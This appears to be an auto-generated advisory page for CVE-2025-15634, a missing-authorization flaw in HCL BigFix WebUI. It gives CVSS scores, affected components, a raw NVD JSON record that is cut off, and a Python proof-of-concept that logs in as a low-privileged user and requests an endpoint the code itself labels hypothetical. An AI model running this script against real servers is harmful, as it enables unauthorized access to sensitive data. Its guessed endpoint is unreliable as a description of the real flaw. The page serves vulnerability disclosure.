Security Vulnerability Report
CVE-2025-15634 CVSS 4.3 MEDIUM

CVE-2025-15634

Published: 2026-05-09 06:16:09
Last Modified: 2026-05-14 20:28:14

Description

A missing authorization vulnerability in HCL BigFix WebUI allows an authenticated user without proper permissions to view sensitive environmental information via direct URL access to the unauthorized page.

CVSS Details

CVSS Score (v3.1, primary)
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
CVSS Score (v4.0, secondary)
5.3 MEDIUM
Weakness
CWE-862 (Missing Authorization)

Configurations (Affected Products)

cpe:2.3:a:hcltech:bigfix_webui_api:*:*:*:*:*:*:*:* (versions before 33) - VULNERABLE
cpe:2.3:a:hcltech:bigfix_webui_application_administration:*:*:*:*:*:*:*:* (versions before 40) - VULNERABLE
cpe:2.3:a:hcltech:bigfix_webui_cmep:*:*:*:*:*:*:*:* (versions before 22) - VULNERABLE
cpe:2.3:a:hcltech:bigfix_webui_common:*:*:*:*:*:*:*:* (versions before 101) - VULNERABLE
cpe:2.3:a:hcltech:bigfix_webui_content_app:*:*:*:*:*:*:*:* (versions before 28) - VULNERABLE
Further affected WebUI components listed in the raw JSON record below: custom (before 50), data_sync (before 37), extensions (before 14), framework (before 35), insights (before 32), ivr (before 23), mdm (before 29), patch (before 54); the record is truncated after that entry.
HCL BigFix WebUI (see the official advisory KB0130587 for the specific affected versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Configuration
target_host = "https://bigfix-server.example.com"
login_endpoint = "/login"
# Hypothetical vulnerable endpoint based on description
vuln_endpoint = "/api/environment/config"

# Low-privileged user credentials
username = "test_user"
password = "test_password"


def exploit():
    session = requests.Session()

    # 1. Authenticate with low privileges
    print(f"[*] Logging in as low-priv user: {username}")
    login_payload = {
        "username": username,
        "password": password,
    }
    try:
        # verify=False disables TLS certificate validation (lab use only)
        login_resp = session.post(target_host + login_endpoint, data=login_payload, verify=False)
        if login_resp.status_code != 200:
            print("[-] Login failed.")
            return
        print("[+] Login successful.")

        # 2. Directly access the unauthorized sensitive page
        print(f"[*] Attempting to access sensitive info at: {vuln_endpoint}")
        exploit_resp = session.get(target_host + vuln_endpoint, verify=False)
        if exploit_resp.status_code == 200:
            print("[+] Exploit successful! Sensitive data retrieved:")
            print(exploit_resp.text)
        else:
            print(f"[-] Request failed with status code: {exploit_resp.status_code}")
    except Exception as e:
        print(f"[-] An error occurred: {e}")


if __name__ == "__main__":
    exploit()
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15634", "sourceIdentifier": "[email protected]", "published": "2026-05-09T06:16:09.130", "lastModified": "2026-05-14T20:28:14.120", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A missing authorization vulnerability in HCL BigFix WebUI allows an authenticated user without proper permissions to view sensitive environmental information via direct URL access to the unauthorized page."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": 
"NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_webui_api:*:*:*:*:*:*:*:*", "versionEndExcluding": "33", "matchCriteriaId": "8680650F-B404-4812-AD8D-F93A7F52C20B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_webui_application_administration:*:*:*:*:*:*:*:*", "versionEndExcluding": "40", "matchCriteriaId": "D8757E08-9B05-45FD-BEAC-7D27423C7FC4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_webui_cmep:*:*:*:*:*:*:*:*", "versionEndExcluding": "22", "matchCriteriaId": "DD60E500-25B7-42B4-8B0E-D84967B78AF4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_webui_common:*:*:*:*:*:*:*:*", "versionEndExcluding": "101", "matchCriteriaId": "E6441EA2-8CF7-4A3B-8AD8-BBE2A62E5DF4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_webui_content_app:*:*:*:*:*:*:*:*", "versionEndExcluding": "28", "matchCriteriaId": "CFE1EED8-C5C9-47CD-B20E-E5D113B4DF48"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_webui_custom:*:*:*:*:*:*:*:*", "versionEndExcluding": "50", "matchCriteriaId": "92437F31-8DD7-4440-AF6A-02B5DDA55A3F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_webui_data_sync:*:*:*:*:*:*:*:*", "versionEndExcluding": "37", "matchCriteriaId": "9F3C0E3C-1CE1-43FC-9B4C-8D0EE77E3E10"}, {"vulnerable": true, 
"criteria": "cpe:2.3:a:hcltech:bigfix_webui_extensions:*:*:*:*:*:*:*:*", "versionEndExcluding": "14", "matchCriteriaId": "0F22F7CB-24CC-445F-87D9-CB0B4346401E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_webui_framework:*:*:*:*:*:*:*:*", "versionEndExcluding": "35", "matchCriteriaId": "B7C2A16C-A840-47FF-9272-A17BD4CD7499"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_webui_insights:*:*:*:*:*:*:*:*", "versionEndExcluding": "32", "matchCriteriaId": "97643BD1-2CE5-43A4-86C9-C25EE643E977"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_webui_ivr:*:*:*:*:*:*:*:*", "versionEndExcluding": "23", "matchCriteriaId": "58DA2A15-7F8A-4D04-A158-18CBB803BF8C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_webui_mdm:*:*:*:*:*:*:*:*", "versionEndExcluding": "29", "matchCriteriaId": "A1287A97-8E7A-4B5F-BE14-2D871BD2E886"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_webui_patch:*:*:*:*:*:*:*:*", "versionEndExcluding": "54", "matchCriteriaId": "5CA0410D-FC23-4F02 ... (truncated)